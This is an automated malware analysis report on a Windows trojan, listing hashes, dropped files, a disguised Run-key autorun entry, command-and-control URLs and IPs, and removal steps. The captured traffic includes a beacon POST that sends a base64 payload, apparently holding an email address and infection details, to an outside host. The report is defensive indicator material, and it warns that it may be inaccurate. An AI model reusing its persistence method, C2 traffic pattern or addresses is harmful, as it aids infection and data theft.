Trojan.Win32.Scar.jbjc (Kaspersky), Gen:Variant.Kazy.604861 (B) (Emsisoft), Gen:Variant.Kazy.604861 (AdAware)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 000a8fff3dc7e5ee339acd7651e61389
SHA1: 8ea3631a532f4a2f8175e4604790d5b2cc4bf20f
SHA256: fd34939bdd9cf5ea9a89ae28668b13da840154eb427cff950a0ffa5f063ac55c
SSDeep: 6144:X1p9JPd0OmBRGezfbsNCuqkBPZxo4Wx2Pqe:H9JP d6ezfbsNCTihxzWpe
Size: 272384 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-04-29 21:56:08
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:344
qfjlkyhjspng.exe:4348
ewrrwkxzfemuscomjih.exe:2564
edxqdqrjinn.exe:3580
edxqdqrjinn.exe:5332
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:
ShimCacheMutex
File activity
The process %original file name%.exe:344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (272 bytes)
The Trojan deletes the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (0 bytes)
The process qfjlkyhjspng.exe:4348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
The Trojan deletes the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
The process ewrrwkxzfemuscomjih.exe:2564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\edxqdqrjinn.exe (1425 bytes)
The Trojan deletes the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
The process edxqdqrjinn.exe:3580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\qfjlkyhjspng.exe (1425 bytes)
C:\hgsywldzj\qnglq0unrq (84 bytes)
The Trojan deletes the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (0 bytes)
The process edxqdqrjinn.exe:5332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
The Trojan deletes the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
Registry activity
The process %original file name%.exe:344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 33 C3 FC F0 18 9E 4B 26 B1 8D 41 D4 D2 26 8D"
The process ewrrwkxzfemuscomjih.exe:2564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE A2 A6 D5 FE B6 E5 FA 9F F6 DB 69 C5 B8 34 1D"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Trap Credential Filtering KtmRm" = "C:\hgsywldzj\edxqdqrjinn.exe"
The process edxqdqrjinn.exe:3580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 15 81 A8 A9 CA 88 35 6F 21 06 0F A0 CF 22 08"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:344
qfjlkyhjspng.exe:4348
ewrrwkxzfemuscomjih.exe:2564
edxqdqrjinn.exe:3580
edxqdqrjinn.exe:5332 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (272 bytes)
C:\hgsywldzj\edxqdqrjinn.exe (1425 bytes)
C:\hgsywldzj\qfjlkyhjspng.exe (1425 bytes)
C:\hgsywldzj\qnglq0unrq (84 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Trap Credential Filtering KtmRm" = "C:\hgsywldzj\edxqdqrjinn.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 197786 | 198144 | 4.59472 | d3db33cbe1e67b5fc50d77d3ab9d3dd0 |
.rdata | 204800 | 51540 | 51712 | 4.29268 | e689de08fdfceeb94d7941142e8ddfbc |
.data | 258048 | 18780 | 7168 | 2.96275 | b56ddf3be60a92d054c9f7de7e054bb4 |
.reloc | 278528 | 14112 | 14336 | 4.68663 | b05f0be3485a2f936c5109f90eeec610 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://machineanimal.net/index.php | 72.52.4.91 |
hxxp://machineproblem.net/index.php | 184.168.221.34 |
hxxp://figureproblem.net/index.php | 98.139.135.198 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: machineproblem.net
HTTP/1.1 302 Found
Connection: close
Pragma: no-cache
cache-control: no-cache
Location: /index.php
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: figureproblem.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
post=aG9jaHJlaW5qQGNpdGlmaW5hbmNpYWwuY29tCWhnc3l3bGR6agllZHhxZHFyamlubi5leGUJcWZqbGt5aGpzcG5nLmV4ZQlUcmFwIENyZWRlbnRpYWwgRmlsdGVyaW5nIEt0bVJtCVBhbmVsIFJlcG9ydHMgVGFibGV0IFRyYW5zYWN0aW9uCTAwNQ==
HTTP/1.0 200 OK
Date: Fri, 26 Jun 2015 15:08:45 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
..O.:.......7.'....."...J......X.....TiL.....t....f...==dgv.._e..O.....U..L l<%"O{.|%rs......v....B`.(.:V,c......._0.;.......Q(0.,BV...T..7. FF......AI.%..`....l...D.......$".......v1mG.F_Za...........L.?..E....Jx...z.G.A.....dt......c.......6.0..O"hI&..2%-../z..N..s.}........Z.P.....Z.C..0.[...... 2-..C...q`..S)...$....L~..tM...0..Q...O.q$J.7~.p.:qF5_..b...E...o..n...p....h.L...E.._...j={.... ......Y-V.K..:....}i..._.Yh.....)qq,..H....^....P.F..:%....''(0{.h,7.o..TV.H....?.d..o6...y.Y....V.n_>z.jy.]=..Gq...r...G.*..)Gp2.,.I.'o.....$....k.Ywb.J..1O...W..`...8......O.W....}........T...........T.......(j.....t..r3i....A.{..U.>.j......,[.....L._<x...m..e.....[.....=.8......f A..Rw.h.x...."...-.p')C._.......<.mJ..o...VO..-........7.?..U8......AQ.I....7. ...,..".|:.hJ.I.p.F..|WC!Z...9..]..k'..\M>..%..Qc.]..vM....7'c;.f.....RG.3.y.Cd8O.7.7w.^...Nl..31..{...RC...Ia...'.Y..lC.g.....T..^SI..} .......")%.Y...."..M.\...L......I.GE=.....;...x..E..._.g.C2._.UBH..._a$.{.....|...|.:.ll.iL.1.N}...Hd.2.x..8..,w.u..U6.NWZO..<V.5...-x.h...>...I.f...MB..p.<.P3..3X...oZ)...H..z.......6.#./..wI.p|..../.{......zOSJ..%.>!..cfY.....(...5FF.l...-..O.Q.z.e2.7...o....#. ..2cW8 .(.........,.Y.v.Q......FH.z...|..O...~.....o.../.._.R..V.......0.Y.qr.W.Q.%oJw.I...4...........E.<.... ..
<<< skipped >>>
GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: figureproblem.net
HTTP/1.0 200 OK
Date: Fri, 26 Jun 2015 15:08:44 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
..O.:.......7.'....."...J......X.....TiL.....t....f...==dgv.._e..O.....U..L l<%"O{.|%rs......v....B`.(.:V,c......._0.;.......Q(0.,BV...T..7. FF......AI.%..`....l...D.......$".......v1mG.F_Za...........L.?..E....Jx...z.G.A.....dt......c.......6.0..O"hI&..2%-../z..N..s.}........Z.P.....Z.C..0.[...... 2-..C...q`..S)...$....L~..tM...0..Q...O.q$J.7~.p.:qF5_..b...E...o..n...p....h.L...E.._...j={.... ......Y-V.K..:....}i..._.Yh.....)qq,..H....^....P.F..:%....''(0{.h,7.o..TV.H....?.d..o6...y.Y....V.n_>z.jy.]=..Gq...r...G.*..)Gp2.,.I.'o.....$....k.Ywb.J..1O...W..`...8......O.W....}........T...........T.......(j.....t..r3i....A.{..U.>.j......,[.....L._<x...m..e.....[.....=.8......f A..Rw.h.x...."...-.p')C._.......<.mJ..o...VO..-........7.?..U8......AQ.I....7. ...,..".|:.hJ.I.p.F..|WC!Z...9..]..k'..\M>..%..Qc.]..vM....7'c;.f.....RG.3.y.Cd8O.7.7w.^...Nl..31..{...RC...Ia...'.Y..lC.g.....T..^SI..} .......")%.Y...."..M.\...L......I.GE=.....;...x..E..._.g.C2._.UBH..._a$.{.....|...|.:.ll.iL.1.N}...Hd.2.x..8..,w.u..U6.NWZO..<V.5...-x.h...>...I.f...MB..p.<.P3..3X...oZ)...H..z.......6.#./..wI.p|..../.{......zOSJ..%.>!..cfY.....(...5FF.l...-..O.Q.z.e2.7...o....#. ..2cW8 .(.........,.Y.v.Q......FH.z...|..O...~.....o.../.._.R..V.......0.Y.qr.W.Q.%oJw.I...4...........E.<.... ....D...g.......i....
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_344:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
32.df
32.df
?w/
?w/
zumwoest dgcipdb eupeipzim zsfa bigufomjbi gfya ouu vdzufmce cboorovu ljcaaeuq umo gubolioq vexpitlhis mndecc oiievcec jdoq bfva bmvevtu rnfedaf grgine lnfophti slvocpvu celuli labmaolgne tichuhu acuzu jcnuszm wcej cxloa zau eodgniekb vtboufsy vwjifug uvidv jjdulp epagyo apbef dnbaps efnpep nbxofj dryuf hnluwleb nasrodj msgiiff uirafdisfe rld dzsoyosbui bnociotd jujaqiszlo faenc aozfji wbifebnnu efejsizsfi mnvaze abc sbcil hlel ymgouda hlsepe beye sb
zumwoest dgcipdb eupeipzim zsfa bigufomjbi gfya ouu vdzufmce cboorovu ljcaaeuq umo gubolioq vexpitlhis mndecc oiievcec jdoq bfva bmvevtu rnfedaf grgine lnfophti slvocpvu celuli labmaolgne tichuhu acuzu jcnuszm wcej cxloa zau eodgniekb vtboufsy vwjifug uvidv jjdulp epagyo apbef dnbaps efnpep nbxofj dryuf hnluwleb nasrodj msgiiff uirafdisfe rld dzsoyosbui bnociotd jujaqiszlo faenc aozfji wbifebnnu efejsizsfi mnvaze abc sbcil hlel ymgouda hlsepe beye sb
*upjgaz hpcecvt pja dbsed ucrzescw oilnni gjbocb fibmeneny molc irhnuo gecom gxkinbce lfboofgg jtnoqqiyuf wxlammgax llamazady rlboaorgna zfuta cbsevnsowa unvsop bemtacm rrduep inwidef vas sdne bnpaepc pti ljgofaijco gnpuimc vridonvv sctaibgtip suqlirudpi dlsoq ssovafmpue ewmeau mojkixunli clzoifqne jvevetiz xrmamjj vadsupjlaa ooeljg oardkuf megfikjs pacvubre fbfofoys rgead egbful nmtampv gtbalpiso zvgifgdoea iuwjnarjbi gjago gtbujwfe palb pjn sljanao odsmawrkem frvad gjpilnk fuoj eevaj jnvozffoi imipg gsrio bfdunuver eemmsa modsoclcu mgdatfyiei ssgeplvi mpwi dzazuna epfleybru nsd juwhoyajou llzaf nhlaocfgo ammbemlg egl
*upjgaz hpcecvt pja dbsed ucrzescw oilnni gjbocb fibmeneny molc irhnuo gecom gxkinbce lfboofgg jtnoqqiyuf wxlammgax llamazady rlboaorgna zfuta cbsevnsowa unvsop bemtacm rrduep inwidef vas sdne bnpaepc pti ljgofaijco gnpuimc vridonvv sctaibgtip suqlirudpi dlsoq ssovafmpue ewmeau mojkixunli clzoifqne jvevetiz xrmamjj vadsupjlaa ooeljg oardkuf megfikjs pacvubre fbfofoys rgead egbful nmtampv gtbalpiso zvgifgdoea iuwjnarjbi gjago gtbujwfe palb pjn sljanao odsmawrkem frvad gjpilnk fuoj eevaj jnvozffoi imipg gsrio bfdunuver eemmsa modsoclcu mgdatfyiei ssgeplvi mpwi dzazuna epfleybru nsd juwhoyajou llzaf nhlaocfgo ammbemlg egl
uabod dzra epogei gnlo fngus ocs kbkucklog rzvohlli agxvomcfik osjz lcdode hnba xcz eqfsojuie zlpejdn fvsisortul teu wgleb llfigbtuel gfexezf aalicfii dsavulrqa rdna bbu xfitic cgjit ttahecibe jxqil mgjesrda xda asjionolr oyowlu ogpz bel jgjopspiu gbwinr ffg bllincdugi kzxe aklmelzoci ffhulzixob oofipga pszug rcr pojfuhmm agx fvc lntug srgaovlgec yvtukjjae ofd ucpeabe lhsi lrye bujponxqe hevulew cpdel zhdunmcuup upb iazdmahtul ukscukg rtcuzp byju lbgaad igglu sohdo aisjme relleigw fobpa pliciengl lmgebof eedencelo moxvivjj mddag aekoy uec faef sqzelwdu dasiyodi mimo oodeaib jmjudd znhuaa ifjw npeaoboc hpr utu rjtan qrkastm nfjifm accbutrzo
uabod dzra epogei gnlo fngus ocs kbkucklog rzvohlli agxvomcfik osjz lcdode hnba xcz eqfsojuie zlpejdn fvsisortul teu wgleb llfigbtuel gfexezf aalicfii dsavulrqa rdna bbu xfitic cgjit ttahecibe jxqil mgjesrda xda asjionolr oyowlu ogpz bel jgjopspiu gbwinr ffg bllincdugi kzxe aklmelzoci ffhulzixob oofipga pszug rcr pojfuhmm agx fvc lntug srgaovlgec yvtukjjae ofd ucpeabe lhsi lrye bujponxqe hevulew cpdel zhdunmcuup upb iazdmahtul ukscukg rtcuzp byju lbgaad igglu sohdo aisjme relleigw fobpa pliciengl lmgebof eedencelo moxvivjj mddag aekoy uec faef sqzelwdu dasiyodi mimo oodeaib jmjudd znhuaa ifjw npeaoboc hpr utu rjtan qrkastm nfjifm accbutrzo
B%Q@e.Uv
B%Q@e.Uv
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
GetProcessWindowStation
GetProcessWindowStation
operator
operator
GDI32.dll
GDI32.dll
GetKeyboardType
GetKeyboardType
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
PeekNamedPipe
PeekNamedPipe
KERNEL32.dll
KERNEL32.dll
zcÃ
zcÃ
%Documents and Settings%\%current user%
%Documents and Settings%\%current user%
C:\hgsywldzj\
C:\hgsywldzj\
c:\%original file name%.exe
c:\%original file name%.exe
0